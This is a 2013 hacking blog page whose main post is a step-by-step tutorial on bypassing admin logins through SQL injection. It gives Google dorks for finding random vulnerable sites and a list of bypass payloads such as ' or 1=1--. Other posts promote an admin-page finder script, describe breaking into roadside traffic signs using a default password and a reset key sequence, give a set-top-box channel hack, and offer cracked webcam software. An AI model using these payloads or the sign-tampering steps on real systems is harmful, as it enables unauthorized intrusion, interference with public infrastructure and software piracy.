Sunday, 28 April 2013

Exploting web application by SQL injection (step by step tutorial )


Hello Readers, Today I am sharing with you how to exploit web application by SQL Injection Attack. In this post step by step I show you how to bypass admin login using some queries 





What is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

[Step – 1] Find SQL Injection Vulnerable Website


First we need vulnerable site to the attack. This is the first step in SQL injection exploitation and like every other hacking attack is the most time consuming, and is the only time consuming step.


1) By Google Dork

Google dorks are the center of the Google Hacking. Google database is the biggest so hackers use to exploit that database by using various search engine commands or complex search queries to locate sensitive data and vulnerable devices on the internet. For Example use this Google Dork to find randomly vulnerable website for SQL injection.


There is a large number of Google dork for basic SQL injection. Here is the best:


inurl:admin.asp

inurl:login/admin.asp

inurl:admin/login.asp

inurl:adminlogin.asp

inurl:adminhome.asp

inurl:admin_login.asp

inurl:administratorlogin.asp

inurl:login/administrator.asp

inurl:administrator_login.asp


2) By Automated Tools

Today many tools are available for found a vulnerable site. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password. “Actually finding admin page is nothing but just a directory of a particular website“.
you can use  admin finder script (perl script) I share this script in my previous post. You can get this script and see the tutorial

[Step - 2] SQL Injection Queries

Here is some popular SQL injection queries list. We can use these to bypass login authentication. These queries confuse the databases.


‘or’’=’

admin'--

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 

[Step – 3] Exploitation Web Applications by SQL Injection
After find admin page of any vulnerable web application. We can exploit that vulnerable web application using client supplied SQL queries. Its enable to execute unauthorized SQL commands.

For example, when a user logs onto a webpage by using user name and password for validation, a SQL query is used there. However an attacker can use SQL\ injection to send specially crafted username and password fields that poison the original SQL queries.


Let’s see an example that illustrates this kind of attack so that we can fully understand how it works. We have a sql vulnerable website

 you can watch this demo

We found an SQL injection point for exploitation. In the image below we can see login page or user authentication form of this web site.


click here to see the page


www.demo.testfire.net has an authentication form for accessing the administration part of its Website. The authentication requires the user to enter a valid username and password. After sending a username and password, the application sends a query to the database to validate the user. 

The query has the following format:



SELECT *
FROM admin
WHERE username = '[USER ENTRY]' AND password = '[USER ENTRY]'




The application doesn’t perform any sanitization of the received data, and therefore we have full control over what we send to the server. The authentication form requests a username and a password from the user. If we enter any random username and password the result page shows an “Invalid username or password” message.

The authentication requires the user to enter a valid username and password. We don’t know the valid user name and password. We inject here some SQL queries to bypass login. In username filed we type admin as a username and in password filed we set “or”=”

The query has the following format:


SELECT *
FROM admin
WHERE username = 'admin' AND password = '’or’’=’'


 


If the query runs successfully we will bypass the login without knowing username and password. In the below Image we can see we bypass login and we use admin panel as an administrator. We manage website contains as we want.


* In My next post we will discuss about Blind SQL Injection.



If you like this post then kindly Share with your friends and groups and hit like on  sandeep.infocom Official or

 Connect With us on hackers point my facebook page 
thanks a lot for visit my page



Posted by at 2 comments:

Open source admin page finder tool (riddhi)

Today many tools are available for found admin pages. Tools make works easy and saving our time. Admin Page Finding tools which scans the vulnerable websites for administrator login pages. It makes use of a predefined list for finding the admin login pages. After finding the pages, it may present us the page on which we can login with the administrator password.  

Actually finding admin page is nothing but just a directory of a particular website“. 

Admin Finder Script is an open source script which is designed in Perl Language. For use this tool we need to install Active Pearl on our machine.


The things you need 

 Download actibe perl


Download   admin finder perl script
After install Perl for launching the Admin Finder Perl Script we have to use the command prompt.  For launching this application just go to the path directory of our Perl and type the name of the exploit.

Here our script is working now just fill in the name of the site whose admin page we want to find for the further security assessments. And in the page type just type ‘any’ for the language input
 In the image below we can see that it’s finding the admin page in website by matching the page name with its Pre-built database

If you have any doubt feel free to comment here and You like my this post then kindly Share with your friends and groups. and hit like on sandeep.infocom Official or

 Connect With us on facebook



Posted by at No comments:

Saturday, 20 April 2013

Hacking Traffic Signals

Road sign hacking means hacking the road sign which means you can control the road signs which are on the road side to tell the ways to which the road leads to. For example –the following road leads to los angels 50 kms blab la.

Although this traffic system is not much in practice in INDIA but very much popular in foreign countries. So as I always say that try all these on your own risk as this is totally ILLEGAL so be careful.
Most of the road sign are manufactured by IMAGO security Solution Company.
1.       The access panel on the sign is generally protected by a small lock, but you may often see them left unlocked. Or if they are locked then u can unlock them using hammer or something like that. upon opening the access panel you will see some panels which are having display electronics. 
2.       The black control pad on that display electronics is attached by a curly cord, with a            keyboard on the front.
3.       There your programming comes into existence. Scroll through the menu selection to “Instant Text”. Type whatever you want to get displayed on the screen. Hit ENTER to submit.You can now throw it up on the sign by selecting “Run w/out save” or some more pages can be added to it by selecting “ADD PAGES”.
Now you must be wondering how easy it is. But it’s not so easy. When you are going to change them you are being prompted for password. Guys n Gals that’s the main issue. PASSWORD  . . . . . .
So the default password there is DOTS.
So go for it and you can change the display but what if some office personnel have changed it to something else.
Don’t worry you can reset it to dots by following the procedure:à

CTRL + SHIFT +DIPY

Using above will reset the password to DOTS and again do it by using DOTS as the password.

So enjoy all this stuff on your risk.
HAPPY HACKING . . .   

Posted by at No comments:

Airtel Digital TV Satellite Update Hack Get Free FTA channels and Out of Zone Pay channels


Airtel has been constantly changing their Software which operates the STB’s which we have in our home. I don’t know why but the latest Update seems pretty Boring as it is having a new bad and Rude Main Menu. Share if you Agree :) .
By following the below mentioned method you can Get  FTA channels,and Channels which are not available in India. If you are that Lucky and Blessed you might have a chance of viewing all the Band 2 channels for Free. How it sound’s ?   One is for sure that you will get some FTA channels.in your ADTV.

1.First unplug the Adapter of your  STB
2.Remove your View Card from the back of the STB
3. Turn On the STB and Insert the View card
4. When the three LEDS on the STB starts to blink together, You will get a Please wait Initializing message
5. Immediately press the Exit key on your remote two times and enter 2465 
6. The STB will start Automatic downloading of the new software
7. Wait for this to finish and Dont Cut the Power, You must update the STB for the Proper Orientation of the FTA channels8. After the Upgradation the STB will automatically restart
9. Remove your Dish cable from the Back of the STB
10. Now you will see installation Setup
11. The first satellite will be NES7, Change the second one to “OTHER” under the FTA settings
12. Now try Scaning for FTA always use Quick scan
13. Try changing the Symbol rate and Frequencies
14. If you get any channel press save and it can be viewed after the channel 999.

Posted by at 1 comment:

Monday, 15 April 2013

WEBCAM 7 PRO WITH SERIAL


Today i want to share a great software . Webcam 7 Pro is a powerful webcams and network cameras monitoring, recording and streaming software for private and professional use. it offers unique features and unequaled ease of use to let you manage multiple video sources on the same computer. It is the ideal tool to secure your goods and keep an eye on them remotely from your phone or over internet.

webcam 7 is a brand new product based on webcamXP.
The user interface is the same however it offers exciting enhancements such as :
• Flash Video (FLV) audio and video streaming (high frame rate for low bandwidth)
• MJPEG recording with audio support.
This version is ideal for putting live webcam on your web page and is robust for 24/7 broadcasting. Supports a single video source.

webcam 7 Free is the basic product for home-users. It lets you to stream via HTTP, Windows Media or to upload via FTP/FTPS or HTTP/HTTPS Post. It also lets you add overlays / watermarks over your video streams and the basic features such as capturing or recording at fixed interval. This version is ideal for putting live webcam on your web page and is robust for 24/7 broadcasting. Supports a single video source.

Webcam 7 Private is already more advanced and beside the multiple video sources support is also offers the possibility to filter by IP and to manage who can access your video streams smartly. You can limit users in view time and don't have to worry about your privacy. Supports up to 5 video sources.

webcam 7 PRO is the most advanced version of the software. It has all the features of the Private version and supports and includes the motion detector (optical and/or acoustic detectors), the advanced alerts manager, the ability to log traffic to files and the digital video recorder (permanent recording). It's the perfect solution for advanced security purposes at low cost. Supports unlimited number of video sources.

It is now available for beta testing and you can install it even if webcamXP is already installed, it will use its own settings, the only part in common is the IP Camera Directshow filter.
If you have a webcamXP license issued less than 2 years ago then you are entitled to use webcam 7 PRO. a free single source mode and the PRO trial mode are also enabled.

supported devices:
- usb webcams (WDM driver required)
- tv, analog or multi-input capture cards (WDM driver required)
- ip cameras (JPEG/MJPEG/MPEG4)
- Windows Media streams (ASF)
- local video files (AVI/WMV/MP4/MOV/...)

supported streaming modes:
- still jpeg images for low-tech devices
- flash client (compatible with most operating systems and handheld devices)
- javascript clients (MJPEG or JPEG PUSH)
- Windows Media streaming

additional key features:
- run as service new !
- local and remote pan & tilt control (Logitech Orbit, Creative LiveMotion! and IP cameras).
- supports FTP/FTPS and HTTP/HTTPS Post
- motion detector (optical or acoustic) with many possible ways to handle alerts (local recording, ftp, http post, launch external applications)
- advanced users manager to grant limited or unlimited access.
- overlay editor supporting picture in picture, animated gifs, alpha-blending and text editor.
- DVR (permanent recording deleted after X hours)

 (File size 9.0MB)

Posted by at 1 comment:
Labels:
Subscribe to: Comments (Atom)